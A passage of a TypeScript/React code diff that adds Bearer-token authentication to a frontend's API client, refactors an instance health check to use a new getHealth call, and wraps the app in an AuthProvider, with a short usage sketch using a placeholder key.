+    ...(options.headers as Record<string, string>),
   };
 
+  // Add auth header if available
+  if (storedKey) {
+    headers['Authorization'] = `Bearer ${storedKey}`;
+  }
+
   try {
     const response = await fetch(url, {
       ...options,
       headers,
     });
 
+    // Handle authentication errors
+    if (response.status === 401) {
+      throw new Error('Authentication required');
+    }
+
     if (!response.ok) {
       // Try to get error message from response
       let errorMessage = `HTTP ${response.status}`;
@@ -47,7 +60,7 @@ async function apiCall<T>(
       const text = await response.text();
       return text as T;
     } else {
-      const data = await response.json();
+      const data = await response.json() as T;
       return data;
     }
   } catch (error) {
@@ -121,4 +134,7 @@ export const instancesApi = {
     const params = lines ? `?lines=${lines}` : "";
     return apiCall<string>(`/instances/${name}/logs${params}`, {}, "text");
   },
+
+  // GET /instances/{name}/proxy/health
+  getHealth: (name: string) => apiCall<any>(`/instances/${name}/proxy/health`),
 };
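(A usage sketch, not part of the diff: once the key sits under the same sessionStorage name the AuthContext uses, every instancesApi call carries the Authorization header, and a 401 surfaces as an error. The key value shown is a placeholder.)

    import { instancesApi } from '@/lib/api'

    async function listWithAuth() {
      // Same storage key as AUTH_STORAGE_KEY in AuthContext.tsx
      sessionStorage.setItem('llamactl_management_key', '<management-api-key>') // placeholder

      try {
        const instances = await instancesApi.list() // request is sent with Authorization: Bearer <key>
        console.log(instances.map((i) => i.name))
      } catch (err) {
        // apiCall throws 'Authentication required' on HTTP 401
        console.error(err)
      }
    }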
@@ -1,4 +1,5 @@
 import { type HealthStatus } from '@/types/instance'
+import { instancesApi } from '@/lib/api'
 
 type HealthCallback = (health: HealthStatus) => void
 
@@ -8,31 +9,33 @@ class HealthService {
 
   async checkHealth(instanceName: string): Promise<HealthStatus> {
     try {
-      const response = await fetch(`/api/v1/instances/${instanceName}/proxy/health`)
-
-      if (response.status === 200) {
-        return {
-          status: 'ok',
-          lastChecked: new Date()
-        }
-      } else if (response.status === 503) {
-        const data = await response.json()
-        return {
-          status: 'loading',
-          message: data.error.message,
-          lastChecked: new Date()
-        }
-      } else {
-        return {
-          status: 'error',
-          message: `HTTP ${response.status}`,
-          lastChecked: new Date()
-        }
-      }
-    } catch (error) {
-      return {
-        status: 'error',
-        message: 'Network error',
-        lastChecked: new Date()
-      }
-    }
+      await instancesApi.getHealth(instanceName)
+
+      return {
+        status: 'ok',
+        lastChecked: new Date()
+      }
+    } catch (error) {
+      if (error instanceof Error) {
+        // Check if it's a 503 (service unavailable - loading)
+        if (error.message.includes('503')) {
+          return {
+            status: 'loading',
+            message: 'Instance is starting up',
+            lastChecked: new Date()
+          }
+        }
+
+        return {
+          status: 'error',
+          message: error.message,
+          lastChecked: new Date()
+        }
+      }
+
+      return {
+        status: 'error',
+        message: 'Unknown error',
+        lastChecked: new Date()
+      }
+    }
@@ -82,7 +85,7 @@ class HealthService {
       }, 60000)
 
       this.intervals.set(instanceName, interval)
-    }, 2000)
+    }, 5000)
   }
 
   private stopHealthCheck(instanceName: string): void {
@@ -3,11 +3,14 @@ import ReactDOM from 'react-dom/client'
 import App from './App'
 import { InstancesProvider } from './contexts/InstancesContext'
 import './index.css'
+import { AuthProvider } from './contexts/AuthContext'
 
 ReactDOM.createRoot(document.getElementById('root')!).render(
   <React.StrictMode>
-    <InstancesProvider>
-      <App />
-    </InstancesProvider>
+    <AuthProvider>
+      <InstancesProvider>
+        <App />
+      </InstancesProvider>
+    </AuthProvider>
   </React.StrictMode>,
 )